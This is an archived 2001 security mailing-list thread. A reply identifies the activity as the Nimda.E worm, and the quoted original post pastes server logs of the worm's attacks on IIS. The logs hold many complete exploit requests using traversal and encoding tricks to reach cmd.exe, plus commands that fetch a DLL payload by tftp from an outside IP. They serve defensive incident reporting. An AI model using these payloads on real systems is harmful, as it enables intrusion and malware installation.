RE: New Worm Variant?
From: Kester, Kelly (KesterK@scott.disa.mil)Date: 10/30/01
- Previous message: Aj Effin Reznor: "New Worm Variant?"
- Maybe in reply to: Aj Effin Reznor: "New Worm Variant?"
- Next in thread: Ryan Russell: "Re: New Worm Variant?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <3D2B4A576AA7D411B9F100B0D0496D8F011CFD9E@emssct2.scott.disa.mil> From: "Kester, Kelly" <KesterK@scott.disa.mil> To: 'Aj Effin Reznor' <aj@reznor.com>, incidents@securityfocus.com Subject: RE: New Worm Variant? Date: Tue, 30 Oct 2001 08:56:16 -0600
NIMDA.E (new variant)
http://www.sarc.com/avcenter/venc/data/w32.nimda.e@mm.html
-----Original Message-----
From: Aj Effin Reznor [mailto:aj@reznor.com]
Sent: Tuesday, October 30, 2001 1:20 AM
To: incidents@securityfocus.com
Subject: New Worm Variant?
Anyone seen a new worm doing something like this?
Checking back through my logs, I haven't had a NIMDA instance yet looking
for httpodbc.dll . Caught my eye. Anyone else? (Yes, some produce a
code 200 rather than 404, that's to be expected on this system).
Log times are in PST
[29/Oct/2001:17:08:22 -0800] "GET
/scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0" 200 438 "-" "-"
[29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332
"-" "-"
[29/Oct/2001:17:08:44 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 384
"-" "-"
[29/Oct/2001:17:08:52 -0800] "GET
/MSADC/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0" 200 436 "-" "-"
[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-"
"-"
[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
200 394 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\h
ttpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:21 -0800] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\h
ttpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:30 -0800] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\h
ttpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:30 -0800] "GET /c/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
[29/Oct/2001:17:09:40 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
200 394 "-" "-"
[29/Oct/2001:17:09:52 -0800] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\h
ttpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:01 -0800] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\h
ttpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:11 -0800] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\h
ttpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:11 -0800] "GET /d/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
[29/Oct/2001:17:10:20 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:10:30 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2
0cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:38 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2
0cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:47 -0800] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2
0cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:55 -0800] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0"
200 393 "-" "-"
[29/Oct/2001:17:11:03 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 431 "-" "-"
[29/Oct/2001:17:11:12 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:21 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:30 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:39 -0800] "GET
/_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-"
"-"
[29/Oct/2001:17:11:48 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 431 "-" "-"
[29/Oct/2001:17:11:57 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:06 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:15 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:24 -0800] "GET
/_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-"
"-"
[29/Oct/2001:17:12:33 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
[29/Oct/2001:17:12:43 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll
HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:12:55 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll
HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:13:04 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll
HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:13:13 -0800] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc
.dll HTTP/1.0" 200 442 "-" "-"
[29/Oct/2001:17:13:24 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:13:33 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:13:42 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:13:51 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0"
200 394 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[29/Oct/2001:17:14:10 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:14:19 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:28 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:37 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:45 -0800] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0"
200 394 "-" "-"
[29/Oct/2001:17:14:53 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:15:07 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:19 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:28 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%
20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0"
200 394 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:15:38 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:15:50 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 414 "-"
"-"
[29/Oct/2001:17:15:59 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20G
ET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:08 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20G
ET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:17 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20G
ET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll
HTTP/1.0" 200 397 "-" "-"
[29/Oct/2001:17:16:37 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:16:46 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2
0cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:16:55 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2
0cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:17:04 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%2
0cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:17:13 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0"
200 393 "-" "-"
-aj.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Previous message: Aj Effin Reznor: "New Worm Variant?"
- Maybe in reply to: Aj Effin Reznor: "New Worm Variant?"
- Next in thread: Ryan Russell: "Re: New Worm Variant?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
